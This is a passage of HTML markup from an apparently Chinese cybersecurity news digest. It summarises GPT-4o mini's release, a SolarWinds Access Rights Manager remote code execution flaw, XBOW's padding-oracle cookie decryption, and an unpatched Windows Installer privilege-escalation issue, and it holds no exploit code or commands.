20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">OpenAI推出了GPT-4o mini，这是一款成本效益高的小型模型，旨在使AI应用更加普及和经济。</span>
		</p>
	</blockquote>
	<section><mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="网络安全速报" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmjr11OHn3icLket3eaqgExkL7Iic8MBldWPvpGBn405yibUSsUYqXhVdibdURZXI3HoQZrm5CDO3m1Bw/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmjr11OHn3icLket3eaqgExkL7Iic8MBldWPvpGBn405yibUSsUYqXhVdibdURZXI3HoQZrm5CDO3m1Bw/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=5122485581254554"></mp-common-miniprogram></section><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100003894" data-ratio="0.4842592592592593" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=3ef887ca&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmjr11OHn3icLket3eaqgExkI21nbGS3YwkxFSVCOs4Tuog1jS0DVXeyyTcdo10kd2EOX0BKn20qqg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p>


	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3>
	<ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">GPT-4o mini的成本效益：GPT-4o mini的价格显著低于之前的先进模型和GPT-3.5 Turbo，使得AI技术更加普及和经济。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">性能提升：GPT-4o mini在MMLU、MGSM和HumanEval等基准测试中的表现优于其他小型模型，特别是在文本智能、数学和编码能力、多模态推理方面。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">增强的安全性：OpenAI将安全性作为模型开发的重要组成部分，通过预训练和后训练的各种技术来加强模型的安全性，包括RLHF和指令层次结构方法。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">更广泛的应用：GPT-4o mini支持文本和视觉模式，并计划支持图像、视频和音频输入输出，这使得它能够适用于更多种类的应用场景。</section></li></ul>
	<br/>
	<p>🏷️: OpenAI, GPT-4o mini, 成本效益, AI应用, 小型模型</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x06
			 SolarWinds Access Rights Manager曝出远程代码执行漏洞</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">SolarWinds Access Rights Manager 存在一个远程代码执行漏洞，攻击者无需身份验证即可利用该漏洞在受影响的安装中执行任意代码。</span>
		</p>
	</blockquote>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="网络安全速报" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmjr11OHn3icLket3eaqgExksGuPIuJCaQdtDv8gWtwAj4F5MW96oT9sjRTx6YGiawaE3RtLHicZ6icJw/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmjr11OHn3icLket3eaqgExksGuPIuJCaQdtDv8gWtwAj4F5MW96oT9sjRTx6YGiawaE3RtLHicZ6icJw/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=2855412218882251"></mp-common-miniprogram>
	</section>


	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3>
	<ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">未经身份验证的远程代码执行：攻击者不需要任何身份验证就能利用这个漏洞，这增加了攻击的可能性和危害。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">系统级别的权限：成功利用该漏洞的攻击者可以在 SYSTEM 权限下执行代码，这是 Windows 操作系统中最高级别的权限，能够对系统进行深远的控制和修改。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">严重的安全风险：由于漏洞的存在，可能导致整个系统的安全受到威胁，攻击者可以安装程序、查看、更改或删除数据，或者创建新的账户。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">EndUpdate 方法的设计缺陷：该漏洞的存在表明在 SolarWinds Access Rights Manager 的设计或实现中存在关键的安全缺陷，需要通过安全更新或补丁来解决。</section></li></ul>
	<br/>
	<p>🏷️: 漏洞, 远程代码执行, 网络安全, SolarWinds</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x07
			 XBOW技术破解加密</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">网页主要介绍了XBOW如何利用padding oracle攻击来破解加密算法，并成功地解密了一个用于身份验证的加密cookie。</span>
		</p>
	</blockquote>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="网络安全速报" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmjr11OHn3icLket3eaqgExkG4gAtoKF4Ao54Nsb0RmdF4KjUqauZPZiaNtibeUToOaKDHJmPq5kFKiaw/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmjr11OHn3icLket3eaqgExkG4gAtoKF4Ao54Nsb0RmdF4KjUqauZPZiaNtibeUToOaKDHJmPq5kFKiaw/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=1522184485545212"></mp-common-miniprogram>
	</section>


	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3>
	<ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Padding oracle攻击展示了在实际应用中，即使是微小的实现错误也可能导致严重的安全漏洞。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">CBC模式加密虽然广泛使用，但如果没有正确处理，也是容易受到攻击的。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">PKCS #7填充方案虽然便于去除填充，但也为攻击者提供了利用的可能性。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">XBOW的成功攻击证明了自动化渗透测试工具在发现和利用加密漏洞方面的高效性和实用性。</section></li></ul>
	<br/>
	<p>🏷️: Padding Oracle攻击, 加密破解, 加密安全</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x08
			 利用Windows安装程序的通用操作实现潜在安全漏洞</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">文章主要探讨了Windows Installer服务中的一个未修复的漏洞，该漏洞可以被利用来提升本地用户的权限。</span>
		</p>
	</blockquote>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="网络安全速报" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmjr11OHn3icLket3eaqgExkpXJaG11kzjEQFymmSpJkxgUn4jXU2ZUIlD3gMVu0ATRQxHm9y73sDA/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmjr11OHn3icLket3eaqgExkpXJaG11kzjEQFymmSpJkxgUn4jXU2ZUIlD3gMVu0ATRQxHm9y73sDA/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=2855412218821151"></mp-common-miniprogram>
	</section>


	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3>
	<ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Windows Installer服务的未修复漏洞可以被利用进行权限提升。文章强调，尽管微软通过重定向守护减轻了symlink攻击的风险，但并没有直接解决漏洞的根本问题。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">自定义动作是实现MSI安装扩展功能的关键。自定义动作可以采用多种形式，但也带来了安全风险，因为它们可能会依赖不受信任的资源或在不必要的权限级别上运行。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">普通用户可以利用自定义动作中的漏洞来执行具有系统完全权限的命令。这可能导致本地权限提升，为恶意用户提供了一种攻击手段。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">微软对于该漏洞的处理不充分。文章指出，微软没有能够复现该问题，因此将其标记为无法复现并关闭了相关报告，尽管该漏洞在最新的Windows版本中仍然存在。</section></li></ul>
	<br/>
	<p>🏷️: Windows Installer, 安全漏洞, 命令执行, 文件删除, 系统权限</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
